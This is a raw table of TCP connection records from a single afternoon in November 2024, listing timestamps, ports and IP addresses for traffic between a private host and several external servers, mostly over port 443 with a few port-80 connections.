Nov 4, 2024 17:32:11.534099102 CET	443	49973	40.115.3.253	192.168.2.5
Nov 4, 2024 17:32:11.749829054 CET	443	49969	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.750478983 CET	49969	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.750498056 CET	443	49969	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.751029968 CET	49969	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.751045942 CET	443	49969	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.751204014 CET	443	49968	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.751559973 CET	49968	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.751594067 CET	443	49968	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.752024889 CET	49968	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.752032042 CET	443	49968	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.881568909 CET	443	49969	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.882329941 CET	443	49969	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.882405043 CET	49969	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.886042118 CET	443	49968	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.886115074 CET	443	49968	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.886197090 CET	49968	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.922689915 CET	49969	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.922720909 CET	443	49969	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.922738075 CET	49969	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.922748089 CET	443	49969	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.924427032 CET	49968	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.924453974 CET	443	49968	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.924464941 CET	49968	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.924472094 CET	443	49968	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.928124905 CET	49974	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.928165913 CET	443	49974	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.928230047 CET	49974	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.928595066 CET	49975	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.928623915 CET	443	49975	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.928678036 CET	49975	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.929195881 CET	49974	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.929213047 CET	443	49974	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:11.929539919 CET	49975	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:11.929553032 CET	443	49975	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.029493093 CET	443	49972	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.030088902 CET	49972	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.030101061 CET	443	49972	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.030625105 CET	49972	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.030631065 CET	443	49972	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.038672924 CET	443	49971	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.039083958 CET	49971	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.039098978 CET	443	49971	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.039537907 CET	49971	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.039545059 CET	443	49971	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.141731024 CET	443	49970	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.145195007 CET	49970	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.145225048 CET	443	49970	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.145755053 CET	49970	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.145761967 CET	443	49970	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.161649942 CET	443	49972	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.161673069 CET	443	49972	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.161722898 CET	443	49972	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.161729097 CET	49972	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.161782026 CET	49972	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.162456989 CET	49972	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.162477970 CET	443	49972	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.162488937 CET	49972	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.162494898 CET	443	49972	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.171478033 CET	443	49971	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.171540976 CET	443	49971	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.171624899 CET	49971	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.172100067 CET	49976	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.172127008 CET	443	49976	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.172198057 CET	49976	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.172425985 CET	49976	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.172439098 CET	443	49976	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.172607899 CET	49971	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.172626972 CET	443	49971	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.172637939 CET	49971	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.172643900 CET	443	49971	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.179827929 CET	49977	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.179858923 CET	443	49977	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.179941893 CET	49977	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.180257082 CET	49977	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.180270910 CET	443	49977	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.271817923 CET	443	49970	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.271832943 CET	443	49970	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.271912098 CET	49970	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.271944046 CET	443	49970	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.272032022 CET	443	49970	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.272097111 CET	49970	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.272330046 CET	49970	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.272345066 CET	443	49970	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.272356033 CET	49970	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.272361994 CET	443	49970	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.276479006 CET	49978	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.276520967 CET	443	49978	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.276592970 CET	49978	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.276926041 CET	49978	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.276942015 CET	443	49978	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.652842999 CET	443	49975	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.652945042 CET	443	49973	40.115.3.253	192.168.2.5
Nov 4, 2024 17:32:12.653068066 CET	49973	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:32:12.655352116 CET	49973	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:32:12.655359030 CET	443	49973	40.115.3.253	192.168.2.5
Nov 4, 2024 17:32:12.655714035 CET	443	49973	40.115.3.253	192.168.2.5
Nov 4, 2024 17:32:12.656523943 CET	49975	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.656553984 CET	443	49975	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.657212973 CET	49975	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.657218933 CET	443	49975	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.658322096 CET	49973	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:32:12.658407927 CET	49973	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:32:12.658411980 CET	443	49973	40.115.3.253	192.168.2.5
Nov 4, 2024 17:32:12.658524036 CET	49973	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:32:12.699337006 CET	443	49973	40.115.3.253	192.168.2.5
Nov 4, 2024 17:32:12.741050959 CET	443	49974	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.751295090 CET	49974	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.751324892 CET	443	49974	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.751766920 CET	49974	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.751774073 CET	443	49974	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.782650948 CET	443	49975	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.782669067 CET	443	49975	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.782721996 CET	49975	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.782735109 CET	443	49975	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.782937050 CET	443	49975	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.784255028 CET	49975	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.785132885 CET	49975	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.785132885 CET	49975	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.785150051 CET	443	49975	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.785154104 CET	443	49975	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.788539886 CET	49979	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.788578033 CET	443	49979	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.788904905 CET	49979	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.789104939 CET	49979	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.789114952 CET	443	49979	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.884162903 CET	443	49974	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.884201050 CET	443	49974	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.884255886 CET	443	49974	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.884272099 CET	49974	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.884948015 CET	49974	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.885317087 CET	49974	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.885339022 CET	443	49974	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.885349989 CET	49974	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.885356903 CET	443	49974	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.888561964 CET	49980	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.888595104 CET	443	49980	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.888761044 CET	49980	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.888956070 CET	49980	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.888967991 CET	443	49980	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.907804966 CET	443	49973	40.115.3.253	192.168.2.5
Nov 4, 2024 17:32:12.908654928 CET	49973	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:32:12.908654928 CET	49973	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:32:12.908675909 CET	443	49973	40.115.3.253	192.168.2.5
Nov 4, 2024 17:32:12.908843994 CET	443	49973	40.115.3.253	192.168.2.5
Nov 4, 2024 17:32:12.908904076 CET	49973	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:32:12.908916950 CET	49973	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:32:12.920998096 CET	443	49977	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.927253962 CET	443	49976	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.938498974 CET	49977	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.938524961 CET	443	49977	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.938985109 CET	49977	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.938992023 CET	443	49977	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.939296007 CET	49976	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.939321995 CET	443	49976	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:12.939713955 CET	49976	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:12.939724922 CET	443	49976	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.010035038 CET	443	49978	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.012969017 CET	49978	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.012995958 CET	443	49978	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.013484001 CET	49978	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.013495922 CET	443	49978	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.065902948 CET	443	49977	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.065978050 CET	443	49977	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.066072941 CET	49977	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.066420078 CET	49977	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.066420078 CET	49977	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.066438913 CET	443	49977	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.066448927 CET	443	49977	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.067152977 CET	443	49976	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.067173958 CET	443	49976	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.067240000 CET	49976	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.067266941 CET	443	49976	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.067329884 CET	443	49976	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.067399025 CET	49976	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.067677021 CET	49976	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.067677021 CET	49976	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.067692995 CET	443	49976	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.067703009 CET	443	49976	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.070256948 CET	49981	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.070305109 CET	443	49981	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.070374012 CET	49981	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.070976019 CET	49981	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.070993900 CET	443	49981	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.071943998 CET	49982	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.071983099 CET	443	49982	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.072048903 CET	49982	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.072196007 CET	49982	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.072208881 CET	443	49982	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.141812086 CET	443	49978	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.141911030 CET	443	49978	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.142185926 CET	49978	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.142357111 CET	49978	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.142357111 CET	49978	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.142383099 CET	443	49978	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.142396927 CET	443	49978	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.144444942 CET	49983	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.144486904 CET	443	49983	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.144558907 CET	49983	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.144730091 CET	49983	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.144742012 CET	443	49983	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.524658918 CET	443	49979	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.549015045 CET	49979	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.549032927 CET	443	49979	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.549484968 CET	49979	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.549489975 CET	443	49979	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.661892891 CET	443	49980	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.676639080 CET	443	49979	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.676707983 CET	443	49979	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.676805973 CET	49979	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.708674908 CET	49980	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.802213907 CET	443	49981	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.805835962 CET	443	49982	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.827841043 CET	49982	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.827858925 CET	443	49982	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.831805944 CET	49982	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.831811905 CET	443	49982	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.832066059 CET	49980	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.832071066 CET	443	49980	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.832526922 CET	49980	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.832530975 CET	443	49980	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.835005999 CET	49979	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.835042953 CET	443	49979	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.835043907 CET	49979	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.835055113 CET	443	49979	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.849275112 CET	49981	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.881350994 CET	443	49983	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.925594091 CET	49981	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.925601959 CET	443	49981	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.926042080 CET	49981	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.926047087 CET	443	49981	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.926924944 CET	49940	80	192.168.2.5	185.215.113.43
Nov 4, 2024 17:32:13.927227020 CET	49984	80	192.168.2.5	185.215.113.43
Nov 4, 2024 17:32:13.927396059 CET	49983	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.931989908 CET	80	49984	185.215.113.43	192.168.2.5
Nov 4, 2024 17:32:13.932049036 CET	49984	80	192.168.2.5	185.215.113.43
Nov 4, 2024 17:32:13.932142019 CET	80	49940	185.215.113.43	192.168.2.5
Nov 4, 2024 17:32:13.932185888 CET	49940	80	192.168.2.5	185.215.113.43
Nov 4, 2024 17:32:13.938272953 CET	49983	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.938280106 CET	443	49983	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.938724041 CET	49983	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.938728094 CET	443	49983	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.950193882 CET	49985	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.950227976 CET	443	49985	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.950347900 CET	49985	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.950479984 CET	49985	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.950495005 CET	443	49985	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.950572014 CET	49984	80	192.168.2.5	185.215.113.43
Nov 4, 2024 17:32:13.955400944 CET	80	49984	185.215.113.43	192.168.2.5
Nov 4, 2024 17:32:13.958585024 CET	443	49982	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.958607912 CET	443	49982	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.958695889 CET	49982	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.958705902 CET	443	49982	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.958781958 CET	443	49982	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.958847046 CET	49982	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:13.966845036 CET	443	49980	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.966906071 CET	443	49980	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:13.966959000 CET	49980	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.024193048 CET	49982	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.024193048 CET	49982	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.024219036 CET	443	49982	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.024229050 CET	443	49982	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.025887966 CET	49980	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.025887966 CET	49980	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.025895119 CET	443	49980	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.025897980 CET	443	49980	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.053742886 CET	443	49981	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.053766012 CET	443	49981	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.053828955 CET	49981	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.053848982 CET	443	49981	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.053906918 CET	49981	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.105254889 CET	49981	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.105254889 CET	49981	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.105288982 CET	443	49981	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.105300903 CET	443	49981	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.159166098 CET	49986	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.159204006 CET	443	49986	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.159272909 CET	49986	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.160150051 CET	49986	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.160164118 CET	443	49986	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.161514044 CET	49987	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.161546946 CET	443	49987	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.161613941 CET	49987	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.161740065 CET	49987	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.161753893 CET	443	49987	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.163127899 CET	49988	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.163168907 CET	443	49988	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.163239002 CET	49988	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.163752079 CET	49988	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.163768053 CET	443	49988	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.185419083 CET	443	49983	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.185447931 CET	443	49983	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.185456991 CET	443	49983	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.185470104 CET	443	49983	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.185501099 CET	49983	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.185513020 CET	443	49983	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.185550928 CET	443	49983	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.185565948 CET	49983	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.185565948 CET	49983	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.185597897 CET	49983	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.188411951 CET	443	49983	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.188474894 CET	443	49983	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.188477993 CET	49983	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.188520908 CET	49983	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.189408064 CET	49983	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.189424038 CET	443	49983	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.189434052 CET	49983	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.189440012 CET	443	49983	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.196764946 CET	49989	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.196810007 CET	443	49989	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.196873903 CET	49989	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.197705030 CET	49989	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.197721958 CET	443	49989	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.817257881 CET	443	49985	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.828584909 CET	49985	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.828593969 CET	443	49985	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.829076052 CET	49985	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.829081059 CET	443	49985	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.843691111 CET	80	49984	185.215.113.43	192.168.2.5
Nov 4, 2024 17:32:14.843873978 CET	49984	80	192.168.2.5	185.215.113.43
Nov 4, 2024 17:32:14.847089052 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:14.852042913 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:14.852121115 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:14.852221012 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:14.857656956 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:14.904216051 CET	443	49988	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.904684067 CET	49988	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.904712915 CET	443	49988	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.905216932 CET	49988	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.905222893 CET	443	49988	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.932775021 CET	443	49989	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.933152914 CET	49989	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.933170080 CET	443	49989	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.933578968 CET	49989	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.933588028 CET	443	49989	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.964334965 CET	443	49985	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.964354992 CET	443	49985	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.964421988 CET	49985	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.964432001 CET	443	49985	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.964603901 CET	443	49985	13.107.246.45	192.168.2.5
